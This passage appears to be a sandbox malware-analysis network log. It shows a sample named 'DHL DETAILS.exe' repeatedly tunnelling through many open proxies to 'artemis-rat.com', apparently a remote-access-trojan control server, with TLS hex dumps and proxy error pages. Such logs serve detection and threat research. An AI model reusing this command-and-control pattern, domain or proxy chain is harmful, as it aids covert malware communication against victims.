                                                                                    Mar 9, 2024 13:14:20.407783031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1693192.168.2.55514247.243.92.19931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.407948971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.711860895 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1694192.168.2.554419138.36.150.1610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.412388086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1695192.168.2.550929162.214.225.223314736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.412564993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1696192.168.2.555169147.75.34.86806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.415365934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.717690945 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.3
                                                                                    Mar 9, 2024 13:14:20.717950106 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 9b b0 86 df 10 ce 07 05 1d 54 8b a6 87 cf 36 8c 3c e9 84 38 80 ba e3 03 23 53 a6 15 46 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRT6<8#SF*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:21.027976036 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 9c 74 68 ae d9 f4 80 a2 5f 05 9d 0c cc ed 16 d6 c5 77 e8 4d 16 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRth_wMDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:21.028197050 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:21.028234005 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:21.484170914 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                    Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                    Mar 9, 2024 13:14:21.486357927 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 5b a4 4f f2 31 fd 53 59 f9 0f 77 2c ee bc d4 e2 03 07 b9 1e 61 84 92 e2 f2 64 cb 09 18 24 dc 62 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 dc bd 44 0d 1c 31 fc c8 75 7d 97 2c 04 a6 1e 27 2d 1a dd b5 c4
                                                                                    Data Ascii: %! [O1SYw,ad$b(D1u},'-85
                                                                                    Mar 9, 2024 13:14:21.792527914 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 a9 9d f0 34 4d a0 e2 87 3b ef f0 83 ae 87 70 f7 21 c1 8a ad 52 a5 56 86 cc f2 3d c9 c1 60 44 3b b7 cd 77 4b 2c cc 44 ef 29 a4 9a 1a 41 70 e1 4e ce 3a f7 4a 9e 6d cd 33 d3 15 69 e4 b5 17 b4 96 78 2b 65
                                                                                    Data Ascii: 4M;p!RV=`D;wK,D)ApN:Jm3ix+e5~Uvl.f*79+NqDv}V?C\g8mhO+[oW^_c)k3l|4e=i/%Po)v9=Dw3F|[(wj/@zr
                                                                                    Mar 9, 2024 13:14:21.794203997 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 c6 9c d2 4a 39 2e 32 64 23 b3 19 ab b0 46 be a2 1c e8 54 9e cb 47 af 79 11 da 31 00 63 5c 1f 3f bc 2e 59 06 95 99 56 fd 2f 79 c1 db 9e 6f ce dc 74 8e 7f d6 fb d7 eb 73 68 cb 8e 01 f7 df 5d bd c8 b7 50 94 f2
                                                                                    Data Ascii: J9.2d#FTGy1c\?.YV/yotsh]P!/?Zq*TfX+ue=yhv6D$AynMg,T0#}cNYb aC$hZ*_nT0qqv{OwPw`O?j?rJ|obMK,M
                                                                                    Mar 9, 2024 13:14:22.104242086 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 8c 66 0c c0 cd 06 9a 46 e4 23 d3 70 4e b1 85 43 f9 ab 95 86 eb a1 78 39 55 3b 84 be 73 7f 02 0f 70 45 d7 6f c0 d7 7e dc 76 fd 89 da 2a 7a 31 f2 b8 98 67 46 09 94 85 1c eb eb 1b 35 fa 0a f2 b4 2a 51 2e 8f df
                                                                                    Data Ascii: qfF#pNCx9U;spEo~v*z1gF5*Q.7h4t%GoCpQo.mP_T;!~3_s5U!/LjV1]5wD1MiUw^0QUD\2N%G%)DaYlm
                                                                                    Mar 9, 2024 13:14:22.104327917 CET1286INData Raw: d2 ce ec e9 00 8f 2b 20 fa 5e d6 fe 7f ce 1d da db a8 2e 49 87 ca c5 28 ec 32 4c 68 81 a3 a3 af 10 5a 6d 76 4e ab 37 8b cf 47 f7 67 8d c6 59 fa 31 e4 9a ae 97 ff a2 ea f5 9c 22 6c 7f 6e a9 b0 45 be 9a d9 e1 ac 4e ce 36 38 ea 34 5b fd 90 1f 98 53
                                                                                    Data Ascii: + ^.I(2LhZmvN7GgY1"lnEN684[S,W?LT5EvWxq;s_Wp3E5eb58y=DTN0+@QN5OktnR0tQu:,%^eO$'MFeI5c>(B


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1697192.168.2.550628148.72.215.230443876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.466773987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1698192.168.2.555129123.57.246.16381186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.466773987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.793601990 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1699192.168.2.555102119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.468859911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1700192.168.2.555135201.13.147.16156786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.469274998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1701192.168.2.55514860.205.132.71806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.469351053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.797003031 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1702192.168.2.5551913.123.150.19231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.469352007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.774338961 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1703192.168.2.55510482.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.473740101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1704192.168.2.555203200.10.73.21056786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.475527048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1705192.168.2.555213161.97.173.42271726352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.477114916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177129030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1706192.168.2.55520691.189.177.18631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.525875092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.849178076 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1707192.168.2.550991212.47.245.57163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.529535055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.567653894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
